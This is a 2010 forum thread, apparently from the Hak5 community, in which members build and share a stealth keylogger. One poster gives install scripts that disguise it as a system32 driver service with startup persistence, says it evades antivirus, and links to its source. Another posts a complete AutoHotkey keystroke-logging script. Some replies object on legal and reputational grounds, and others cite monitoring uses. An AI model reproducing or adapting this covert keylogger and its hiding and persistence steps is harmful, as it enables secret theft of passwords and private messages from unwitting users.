Hak5 Key Logger ?

[Trip]

there are loads of open source keyloggers we should adapt a hak5 version ?

anyone up for this ? ... loads of stealth features would be sweet :)

[aeiah]

there are loads of open source keyloggers we should adapt a hak5 version ?

anyone up for this ? ... loads of stealth features would be sweet :)

so when the law gets involved because some script-kiddie has done something silly, hak5 will get negative press?

just use the tools available if they're up to scratch, or add new features to the best one if its lacking in some area.

[Trip]

no we could produce it similar to a kiddy keylogger (monitoring software) and who cares what end users do with free software/source lol .... there are lots about but all lack some basic stealth functions.

ive tested the one i have the source for and its undetected by any av

and u can also compress the exe to hide it even more

.... i made a great looking 'intellitype driver' looking keylogger last night ... just using reshack and a free keylogger

i also tried rkfree but this throws a wobbler if you change its exe name or modify the file

Edited April 12, 2010 by Trip

[Guest Deleted_Account]

so when the law gets involved because some script-kiddie has done something silly, hak5 will get negative press?

just use the tools available if they're up to scratch, or add new features to the best one if its lacking in some area.

Not necessarily. A keylogger is not always malicious for instance at my work Me and my IT team have basically installed keyloggers (stealthed) and screen capture software as a step at preventing employees from stealing trade secrets and such. Saying all key loggers are malicious is like saying any one using wireshark has malicious intent. This isn't always true, however i realize that an open source hak5 key logger could be manipulated into being malicious but if we only allowed certain members (trusted members) to work on it and release it (with a kill switch of somekind so in some the event someone starts using it maliciously Darren could pwn it remotely :P) lol

[Trip]

ive already started anyway

i have a basic logger ... im very familiar with vb.net, i know im going to get loads of replies saying "use c++" but i tried to dl some c++ source and couldnt get it to build correctly this will be an excellent project to help people that are new to programming

and then once i have a stable working copy with most functions working ill start porting it c++ ... im not familiar with c++ ... but plan to jump in at the deepend over the next few weeks

btw ... i almost have a working copy already

i want to include an auto start option and a command line parameter to set the log file location :) so it could be easily installed remotely apart from that an encrypted logfile would be sweet but i want to get the basics down 1st

2way msn monitoring would be another cool addition

[Guest Deleted_Account]

ive already started anyway

i have a basic logger ... im very familiar with vb.net, i know im going to get loads of replies saying "use c++" but i tried to dl some c++ source and couldnt get it to build correctly this will be an excellent project to help people that are new to programming

and then once i have a stable working copy with most functions working ill start porting it c++ ... im not familiar with c++ ... but plan to jump in at the deepend over the next few weeks

btw ... i almost have a working copy already

i want to include an auto start option and a command line parameter to set the log file location :) so it could be easily installed remotely apart from that an encrypted logfile would be sweet but i want to get the basics down 1st

2way msn monitoring would be another cool addition

hmm interesting vb.net eh? well i am very intrigued any chance you could let me take a look at that source? if you cant post it here pm me a copy if its cool with you

[Trip]

hak.key5

readme.txt

changing the exe name will not affect the program

call the exe using the following

/q calls exe in quiet mode (will not install as service)

/sc calls exe in quiet mode (and adds to windows start up)

/sd calls exe and deletes service (removes from startup) then closes

logs are stored in the same directory as the exe called log.ks

a good method to install would be

create a install.bat file some thing like this

#################################################

copy itypesvc c:\windows\system32\itypesvc.exe

c:\windows\system32\itypesvc.exe /sc

#################################################

and remove the logger remove.bat

#################################################

c:\windows\system32\itypesvc.exe /sd

kill c:\windows\system32\itypesvc.exe

delete c:\windows\system32\itypesvc.exe

#################################################

to access the control panel, you can type hak.key5 anytime to access the program control panel.

to uninstall type hak.key5 to access the control panel

check and un check the auto start check box (to insure registry entry is removed)

stop the logger using the button

close the app using alt+f4 or clicking the X button

dont forget to delete the keylogger.exe from the location u installed / copied it and if you wish to check the reg key is gone

hk_local_machine\software\microsoft\windows\currentversion\run

other options ...

double click the exe to jump straight to the control panel

or

call the prog with /q to load in quiet mode :) doesn't display the panel and only runs for the current session

and source here http://www.sendspace.com/file/nm207a

Edited April 13, 2010 by Trip

[Guest Deleted_Account]

hak.key5

readme.txt

and source here http://www.sendspace.com/file/nm207a

sweet will try in my xp VM ill see what i can add to :P

[Trip]

nice lemme know how it goes ;0)

[azend]

Couldn't this also be done with a teensy usb-hid device that has a microsd card slot? The teensy monitors for keypresses then writes them to a file on the microsd card

[1n5aN1aC]

Couldn't this also be done with a teensy usb-hid device that has a microsd card slot? The teensy monitors for keypresses then writes them to a file on the microsd card

Yes, but how do you go about knowing which keys are pressed? Of course, you can install a autohotkey script, but w/o that I don't know if it's possible.

Here's a great AHK script:

;#NoTrayIcon
Sendmode, InputThenPlay
#SingleInstance force

FormatTime, OutputVar, %A_Now%
FileAppend, `r`n  `r`n  `r`n, %A_ScriptDir%\12.txt
FileAppend, %OutputVar%, %A_ScriptDir%\12.txt
FileAppend, `r`n  `r`n  `r`n, %A_ScriptDir%\12.txt


~Space::
FileAppend, _, %A_ScriptDir%\12.txt
return

~a::
FileAppend, a, %A_ScriptDir%\12.txt
return

~*b::
FileAppend, b, %A_ScriptDir%\12.txt
return

~c::
FileAppend, c, %A_ScriptDir%\12.txt
return

~d::
FileAppend, d, %A_ScriptDir%\12.txt
return

~e::
FileAppend, e, %A_ScriptDir%\12.txt
return

~f::
FileAppend, f, %A_ScriptDir%\12.txt
return

~g::
FileAppend, g, %A_ScriptDir%\12.txt
return

~h::
FileAppend, h, %A_ScriptDir%\12.txt
return

~i::
FileAppend, i, %A_ScriptDir%\12.txt
return

~j::
FileAppend, j, %A_ScriptDir%\12.txt
return

~k::
FileAppend, k, %A_ScriptDir%\12.txt
return

~l::
FileAppend, l, %A_ScriptDir%\12.txt
return

~m::
FileAppend, m, %A_ScriptDir%\12.txt
return

~n::
FileAppend, n, %A_ScriptDir%\12.txt
return

~o::
FileAppend, o, %A_ScriptDir%\12.txt
return

~p::
FileAppend, p, %A_ScriptDir%\12.txt
return

~q::
FileAppend, q, %A_ScriptDir%\12.txt
return

~r::
FileAppend, r, %A_ScriptDir%\12.txt
return

~s::
FileAppend, s, %A_ScriptDir%\12.txt
return

~t::
FileAppend, t, %A_ScriptDir%\12.txt
return

~u::
FileAppend, u, %A_ScriptDir%\12.txt
return

~v::
FileAppend, v, %A_ScriptDir%\12.txt
return

~w::
FileAppend, w, %A_ScriptDir%\12.txt
return

~x::
FileAppend, x, %A_ScriptDir%\12.txt
return

~y::
FileAppend, y, %A_ScriptDir%\12.txt
return

~z::
FileAppend, z, %A_ScriptDir%\12.txt
return

~1::
FileAppend, 1, %A_ScriptDir%\12.txt
return

~numpad1::
FileAppend, 1, %A_ScriptDir%\12.txt
return

~2::
FileAppend, 2, %A_ScriptDir%\12.txt
return

~numpad2::
FileAppend, 2, %A_ScriptDir%\12.txt
return

~3::
FileAppend, 3, %A_ScriptDir%\12.txt
return

~numpad3::
FileAppend, 3, %A_ScriptDir%\12.txt
return

~4::
FileAppend, 4, %A_ScriptDir%\12.txt
return

~numpad4::
FileAppend, 4, %A_ScriptDir%\12.txt
return

~5::
FileAppend, 5, %A_ScriptDir%\12.txt
return

~numpad5::
FileAppend, 5, %A_ScriptDir%\12.txt
return

~6::
FileAppend, 6, %A_ScriptDir%\12.txt
return

~numpad6::
FileAppend, 6, %A_ScriptDir%\12.txt
return

~7::
FileAppend, 7, %A_ScriptDir%\12.txt
return

~numpad7::
FileAppend, 7, %A_ScriptDir%\12.txt
return

~8::
FileAppend, 8, %A_ScriptDir%\12.txt
return

~numpad8::
FileAppend, 8, %A_ScriptDir%\12.txt
return

~9::
FileAppend, 9, %A_ScriptDir%\12.txt
return

~numpad9::
FileAppend, 9, %A_ScriptDir%\12.txt
return

~0::
FileAppend, 0, %A_ScriptDir%\12.txt
return

~numpad0::
FileAppend, 0, %A_ScriptDir%\12.txt
return

~+a::
FileAppend, A, %A_ScriptDir%\12.txt
return

~+i::
FileAppend, I, %A_ScriptDir%\12.txt
return

~,::
FileAppend, `,, %A_ScriptDir%\12.txt
return

~.::
FileAppend, ., %A_ScriptDir%\12.txt
return

~-::
FileAppend, -, %A_ScriptDir%\12.txt
return

~(::
FileAppend, (, %A_ScriptDir%\12.txt
return

~)::
FileAppend, ), %A_ScriptDir%\12.txt
return

~BS::
FileAppend, <, %A_ScriptDir%\12.txt
return

~Return::
FileAppend, `r`n , %A_ScriptDir%\12.txt
return

it doesn't yet get capitols, I know how to do it, and it's in the script for A, but I'm too lazy to finish it right now.

Edited April 16, 2010 by 1n5aN1aC

[H@L0_F00]

I don't think the Hak5 crew would really want this "Hak5 keylogger" in production or distribution. It's a dumb idea.

Hak5 has been accused of spoonfeeding the skiddys since about season 3ish(?)... This will just increase said negativity.

Put your own name on it. There is really no reason to associate it with any of the Hak5 crew.

Edited April 16, 2010 by H@L0_F00

[Guest Deleted_Account]

Well ill have to do another test because my compiler failed lol :P VM crashed and ill have to reinstall XP on it :P lol

[Trip]

lol typical ...

@halo

tbh i dont think there are that many kiddies post on here ... the videos hak5 produces are far to advanced for script kiddies to understand ... lol ... there are some really cool people on this board who all seem to be pretty well rounded

if you've ever visited hacked.com the forum is full of soo much rubbish and hundreds of stupid posts

i started posting there before i discovered hak5 ... and feel settled here.

why not get hak5 recognised for producing the best free opensource keylogger on the market ?

Edited April 18, 2010 by Trip

[Xqtftqx]

Because Hak5 is sponsored, and sponsorships would possibly be dropped if the site produced a key logger, and making it open source would imply that you want somebody to work on it, which is condoning using and creating key loggers

Also, keyloggers are fail.

[Trip]

Also, keyloggers are fail.

my son is 8 ... and i need to keep an eye on his internet usage and msn chats whats so bad about that ?

[Guest Deleted_Account]

Because Hak5 is sponsored, and sponsorships would possibly be dropped if the site produced a key logger, and making it open source would imply that you want somebody to work on it, which is condoning using and creating key loggers

Also, keyloggers are fail.

my son is 8 ... and i need to keep an eye on his internet usage and msn chats whats so bad about that ?

Touche! lol also schools, universities, Colleges, Government agencies, etc. you name it they all use keyloggers for legitimate purposes now they would no longer need to pay for it! and thus less taxes (well not really but still). As an example my school currently employs keyloggers, screen capture devices (hardware and software), Packet monitoring and proxy/VPN monitoring. See in order to use WIFI/ETHERNET, computers etc. you have to agree to the terms that they can (or "may" as stated in there document) be monitoring you on THEIR services. Keyword is THEIR. See using these systems is a privilege and if you want to use it you have to agree to their monitoring. There we go legitimate uses for keyloggers. Also my school enforces a proxy over ethernet so they can log everything and filter content as well as a vpn for the same reason on WIFI :P

[mbf123]

Ok i am a script kiddie and guess what, I want to learn the legit way. Basically by trying every esay hack and then working up from there. That's how u get good at things. Anyway.. I could test the keylogger if you want.

[Guest Deleted_Account]

Well after finally get around to trying it again i can conform it works on Windows XP and 7 (with out UAC on) also note comodo picks it up before it can be launched as a Potentially Unwanted program so had to run with no antivirus also i am working on putting a kill switch in so it could be remotely killed if any skiddy's try releasing it. Especially since i doubt they would know how to remove it (Hence skiddy).

[Infiltrator]

I like the idea of crafting a keylogger application and making it opensource, but using Hak5 as a branding name for distributing to the public totally a bad idea. I guess you could develop a web site and make it available for the public to download.

[Trip]

wow cheers dude thanks for testing :)

i know some of the key presses arnt being detected properly like the backspace and enter keys etc

... but tbh i havnt looked @ this for a few months .... if you get the kill switch working pls post your code ;)

[Guest Deleted_Account]

wow cheers dude thanks for testing :)

i know some of the key presses arnt being detected properly like the backspace and enter keys etc

... but tbh i havnt looked @ this for a few months .... if you get the kill switch working pls post your code ;)

No problem and noticed the key press problem too. So far the fail safe only works at the station it is installed on. Trying to get it to work over the internet so far my idea is to have it connect to a FTP server and check a fail (lets say failsfafe.txt) and if a certain value is present it will remove itself from the computer completely.

Also as others have said maybe we should remove the Hak5 name from it. At any case even if we are collaborating on it they wont lose sponsors this way.